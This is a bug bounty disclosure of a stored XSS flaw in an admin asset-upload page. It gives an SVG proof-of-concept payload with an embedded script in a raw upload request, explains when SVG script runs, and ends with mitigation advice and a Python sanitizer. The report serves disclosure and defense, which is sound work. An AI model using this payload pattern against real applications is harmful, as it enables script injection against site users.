Stored XSS via SVG Upload

2023-07-16 00:31:11
scgajge12
www.huntr.dev

Tags: xss, svg, file upload, administrator screen, proof of concept, request, execution result, poc video, security measures, bug bounty

EPSS: 0.001 (Low), percentile 20.2%

Description

The file upload function on the administrator screen accepts SVG files without sanitizing them. An SVG containing a script element is stored and later served from the application's own origin, so any user who opens the uploaded file's URL has the attacker's JavaScript executed in their browser (stored XSS).

Proof of Concept

Log in to the administrator screen, open the Assets page, and upload the SVG file shown in the request below.

Request

POST /admin/asset/add HTTP/1.1
 ...
-----------------------------32482956685473744651320483298
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
-----------------------------32482956685473744651320483298
 ...

Execution Result

http://localhost/files/asset/d6dbbeb510abf7a3498c0b8dbdbb61738a91ab06.svg

Opening the stored file at this URL renders it as a standalone SVG document, so the embedded script runs and alert(document.domain) shows the application's origin. SVG script does not execute when the file is only referenced from an img tag or a CSS background; it executes when the file is opened directly or embedded via object, embed or iframe, which is why the attack targets users who follow the file's link.

PoC Video

https://drive.google.com/file/d/1egSGIfDD9ZTitGCb9-bLVZmPdMqUPPyK/view?usp=sharing

Measures

Validate uploads against an allowlist of content types, and check the declared type against the file's actual content rather than trusting the Content-Type header or the extension. If SVG must be accepted, sanitize it server-side (remove script and foreignObject elements, on* event-handler attributes, and href values that use javascript: or other active schemes) or rasterize it to PNG. Serve user uploads from a separate origin, or with Content-Disposition: attachment and a restrictive Content-Security-Policy, so that a file that still contains script cannot run in the application's origin.
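A server-side upload gate implementing the measures above, as an added example that is not the reported project's code. The function names (sanitize_svg, storage_headers, RejectedUpload), the blocklist and the allowed URL prefixes are my own choices; the sample input is the SVG from the PoC request above. It uses only the Python standard library so it runs offline; for production, a maintained sanitizer such as DOMPurify with its SVG profile is the better choice, and this code shows what such a sanitizer has to remove.

```python
"""Added example (not the project's code): a server-side gate for SVG uploads.

Rejects malformed or entity-bearing files, strips the parts of an SVG that
can run script, and returns response headers under which a surviving script
still cannot execute in the application's origin.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialise <svg> without an ns0: prefix
ET.register_namespace("xlink", XLINK_NS)

# Elements removed together with their subtree: script containers, embedded
# HTML, and animation elements that can rewrite attributes such as href.
BLOCKED_ELEMENTS = {"script", "foreignObject", "handler", "listener",
                    "set", "animate", "animateMotion", "animateTransform"}
# URL prefixes allowed in href / xlink:href after whitespace is stripped
# (assumption: fragment references, http(s) and embedded raster images suffice).
ALLOWED_URL_PREFIXES = ("#", "http://", "https://", "data:image/")

# The payload from the report above, used here as the sample input.
POC_SVG = b"""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>"""


class RejectedUpload(ValueError):
    """Raised when the file should not be stored at all."""


def _local(name: str) -> str:
    """'{uri}tag' -> 'tag'; unqualified names pass through unchanged."""
    return name.rsplit("}", 1)[-1]


def _safe_url(value: str) -> bool:
    # Browsers ignore whitespace and control characters inside a scheme
    # ("java\tscript:"), so strip them before comparing the prefix.
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    return cleaned.startswith(ALLOWED_URL_PREFIXES)


def sanitize_svg(data: bytes):
    """Return (clean_svg_bytes, list_of_removed_items) or raise RejectedUpload."""
    # Entity declarations are never needed in an icon and enable expansion attacks.
    if b"<!ENTITY" in data:
        raise RejectedUpload("entity declarations are not allowed")
    try:
        root = ET.fromstring(data)   # the parser drops comments and the DOCTYPE
    except ET.ParseError as exc:
        raise RejectedUpload(f"not well-formed XML: {exc}") from None
    if root.tag != f"{{{SVG_NS}}}svg":
        raise RejectedUpload("root element is not <svg> in the SVG namespace")

    removed = []
    for parent in list(root.iter()):          # snapshot: the tree is modified below
        for child in list(parent):
            if _local(child.tag) in BLOCKED_ELEMENTS:
                parent.remove(child)
                removed.append(f"element <{_local(child.tag)}>")
    for elem in root.iter():
        for attr in list(elem.attrib):
            local = _local(attr).lower()
            # on* covers every event handler attribute; href covers xlink:href too.
            if local.startswith("on") or (local == "href" and not _safe_url(elem.attrib[attr])):
                removed.append(f"attribute {local} on <{_local(elem.tag)}>")
                del elem.attrib[attr]
    return ET.tostring(root, encoding="utf-8", xml_declaration=True), removed


def storage_headers(filename: str) -> dict:
    """Headers for serving a stored upload (e.g. from /files/asset/): even a
    script that survived sanitisation cannot run under these."""
    safe_name = re.sub(r"[^\w.-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        # A download instead of an inline document: inline rendering is the
        # context in which SVG <script> runs. Serve from a separate origin
        # instead if the admin UI must preview uploads in the browser.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


if __name__ == "__main__":
    clean, dropped = sanitize_svg(POC_SVG)
    print(clean.decode())
    print("removed:", dropped)
    print(storage_headers("SVG_XSS.svg"))
```

Run against the PoC file, the sanitizer keeps the polygon and drops the script element; the headers function is what the /files/asset/ route would attach to every stored upload, independent of whether sanitization caught everything.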

